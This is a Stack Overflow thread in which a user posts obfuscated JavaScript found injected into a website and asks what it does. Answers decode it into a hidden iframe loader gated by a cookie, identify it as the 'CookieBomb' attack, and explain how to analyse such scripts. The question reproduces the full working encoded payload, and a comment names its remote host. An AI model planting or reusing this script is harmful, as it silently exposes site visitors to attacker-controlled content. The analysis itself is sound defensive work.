# Malicious code found on website, what does it do?

Tags: javascript

I've found this code on a website I've been asked to help with and it's causing all sorts of mayhem. At first it redirected to another site, I think to try and deliver some sort of payload. I have no idea how to decrypt this though and am very curious. Could someone point me in the right direction?

Doing a Google search for part of it reveals a quite a few sites that seem to have it.

`<script type="text/javascript" language="javascript" >

asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,175,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,175,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,170,147,154,163,164,164,62,167,170,145,166,170,160,163,153,155,147,62,147,163,161,63,147,167,167,63,147,163,171,162,170,151,166,62,164,154,164,53,77,21,16,44,175,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,44,101,44,53,145,146,167,163,160,171,170,151,53,77,21,16,44,175,62,167,170,175,160,151,62,146,163,166,150,151,166,44,101,44,53,64,53,77,21,16,44,175,62,167,170,175,160,151,62,154,151,155,153,154,170,44,101,44,53,65,164,174,53,77,21,16,44,175,62,167,170,175,160,151,62,173,155,150,170,154,44,101,44,53,65,164,174,53,77,21,16,44,175,62,167,170,175,160,151,62,160,151,152,170,44,101,44,53,65,164,174,53,77,21,16,44,175,62,167,170,175,160,151,62,170,163,164,44,101,44,53,65,164,174,53,77,21,16,21,16,44,155,152,44,54,45,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,175,53,55,55,44,177,21,16,44,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,53,100,150,155,172,44,155,150,101,140,53,175,140,53,102,100,63,150,155,172,102,53,55,77,21,16,44,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,106,175,115,150,54,53,175,53,55,62,145,164,164,151,162,150,107,154,155,160,150,54,175,55,77,21,16,44,201,21,16,201,21,16,152,171,162,147,170,155,163,162,44,127,151,170,107,163,163,157,155,151,54,147,163,163,157,155,151,122,145,161,151,60,147,163,163,157,155,151,132,145,160,171,151,60,162,110,145,175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44,200,200,44,162,110,145,175,167,101,101,64,55,44,162,110,145,175,167,101,65,77,21,16,44,151,174,164,155,166,151,62,167,151,170,130,155,161,151,54,170,163,150,145,175,62,153,151,170,130,155,161,151,54,55,44,57,44,67,72,64,64,64,64,64,56,66,70,56,162,110,145,175,167,55,77,21,16,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,44,101,44,147,163,163,157,155,151,122,145,161,151,57,46,101,46,57,151,167,147,145,164,151,54,147,163,163,157,155,151,132,145,160,171,151,55,21,16,44,57,44,46,77,151,174,164,155,166,151,167,101,46,44,57,44,151,174,164,155,166,151,62,170,163,113,121,130,127,170,166,155,162,153,54,55,44,57,44,54,54,164,145,170,154,55,44,103,44,46,77,44,164,145,170,154,101,46,44,57,44,164,145,170,154,44,76,44,46,46,55,77,21,16,201,21,16,152,171,162,147,170,155,163,162,44,113,151,170,107,163,163,157,155,151,54,44,162,145,161,151,44,55,44,177,21,16,44,172,145,166,44,167,170,145,166,170,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,162,145,161,151,44,57,44,46,101,46,44,55,77,21,16,44,172,145,166,44,160,151,162,44,101,44,167,170,145,166,170,44,57,44,162,145,161,151,62,160,151,162,153,170,154,44,57,44,65,77,21,16,44,155,152,44,54,44,54,44,45,167,170,145,166,170,44,55,44,52,52,21,16,44,54,44,162,145,161,151,44,45,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,64,60,44,162,145,161,151,62,160,151,162,153,170,154,44,55,44,55,44,55,21,16,44,177,21,16,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,201,21,16,44,155,152,44,54,44,167,170,145,166,170,44,101,101,44,61,65,44,55,44,166,151,170,171,166,162,44,162,171,160,160,77,21,16,44,172,145,166,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,155,162,150,151,174,123,152,54,44,46,77,46,60,44,160,151,162,44,55,77,21,16,44,155,152,44,54,44,151,162,150,44,101,101,44,61,65,44,55,44,151,162,150,44,101,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,160,151,162,153,170,154,77,21,16,44,166,151,170,171,166,162,44,171,162,151,167,147,145,164,151,54,44,150,163,147,171,161,151,162,170,62,147,163,163,157,155,151,62,167,171,146,167,170,166,155,162,153,54,44,160,151,162,60,44,151,162,150,44,55,44,55,77,21,16,201,21,16,155,152,44,54,162,145,172,155,153,145,170,163,166,62,147,163,163,157,155,151,111,162,145,146,160,151,150,55,21,16,177,21,16,155,152,54,113,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"["split"](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz^=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a));</script><!--/0c0896-->`

EDIT:
I can't seem to post the entire thing, so I've pasted it to a pastebin for those interested!
http://pastebin.com/w1eH1JkB

Comment: The code you posted is cut in the best part!

Comment: this is malware infection, you need to remove that code and setup file permissions properly on the folders of that server. the code seems to be incomplete so we cant really help about what it does though..

Comment: @Skarlinski Argh! didn't notice that and Stackoverflow won't seem to let me post it. It keeps cutting off at that point.

Comment: @Skarlinski I've posted it in a pastebin if you're interested. http://pastebin.com/w1eH1JkB

Comment: There we go.  It's not as pretty as i'd like, but at least the whole thing is visible now.  Problem was, Markdown and the browser were parsing parts of it, so those parts weren't showing up correctly.  Backticks and indenting can prevent that, for future reference.

Comment: @Julien: Not every encoded script is malware.  With that said, though, it doesn't hurt to at least be a bit suspicious about any code that actively tries to hide what it does.

Answer (score 7, accepted):

After a little tinkering, I came up with this:

```
var code='';
for(i=0;i<a.length;i++) {
  code = code + String.fromCharCode(parseInt(a[i],8)-4);
}
console.log(hax);
```

Which decodes "a" and outputs this:

```
 function zzzfff() {
 var y = document.createElement('iframe');

 y.src = 'REDACTED';
 y.style.position = 'absolute';
 y.style.border = '0';
 y.style.height = '1px';
 y.style.width = '1px';
 y.style.left = '1px';
 y.style.top = '1px';

 if (!document.getElementById('y')) {
 document.write('<div id=\'y\'></div>');
 document.getElementById('y').appendChild(y);
 }
}
function SetCookie(cookieName,cookieValue,nDays,path) {
 var today = new Date();
 var expire = new Date();
 if (nDays==null || nDays==0) nDays=1;
 expire.setTime(today.getTime() + 3600000*24*nDays);
 document.cookie = cookieName+"="+escape(cookieValue)
 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie( name ) {
 var start = document.cookie.indexOf( name + "=" );
 var len = start + name.length + 1;
 if ( ( !start ) &&
 ( name != document.cookie.substring( 0, name.length ) ) )
 {
 return null;
 }
 if ( start == -1 ) return null;
 var end = document.cookie.indexOf( ";", len );
 if ( end == -1 ) end = document.cookie.length;
 return unescape( document.cookie.substring( len, end ) );
}
if (navigator.cookieEnabled)
{
if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

zzzfff();
}
}
```

This code loads an iframe from another site.  It looks like it's just tracking visitors, but they could be doing anything in the iframe (like trying browser exploits).

Comment: Should we be linking to the site from StackOverflow?  It just feels wrong doing so

Comment: Oh wow, thank you very much for decoding that. Fascinating stuff.

Comment: +1. It's also done a very minor bit of obfuscation by adding 4 to the octal value of the characters so just using *String.FromCharCode* creates junk. I would leave the URL in there, let the site be exposed: *tchopp.startlogic.com*.

Answer (score 1):

The content of the encrypted stuff is the so-called ["CookieBomb"](http://malwaremustdie.blogspot.de/2013/07/proof-of-concept-of-cookiebomb-attack.html)-Attack, which is quite often used recently. The decryption and activation is explained in detail in Jeffrey Sambells' ["Anatomy of a Hack"](http://jeffreysambells.com/2012/12/12/anatomy-of-a-hack).

A good method for finding out what's behind this kind of "encrypted JS-stuff" is to prettify the source and putting a `debugger;` statement just before something is `eval()`-ed or written into the document or substituting those with `console.log()` and running them in a JavaScript console. If it should be executed in the client, the evil-makers must always include a decoding mechanism.

JavaScript, obfuscation and the cookie is used to avoid robots getting aware of the "infection". Searching the web for *document.body++* or *function zzzfff* brings a lot of results, however.

Worth noting, `thatss.fromCharCode.apply(ss,a)` - the decoding function - will be only `eval`-ed if `zz` had a value of 2 before and `document.body++` succeeded or the client's implementation did something wrong; thus targeting to something very specific (or the coder of this snippet did something wrong).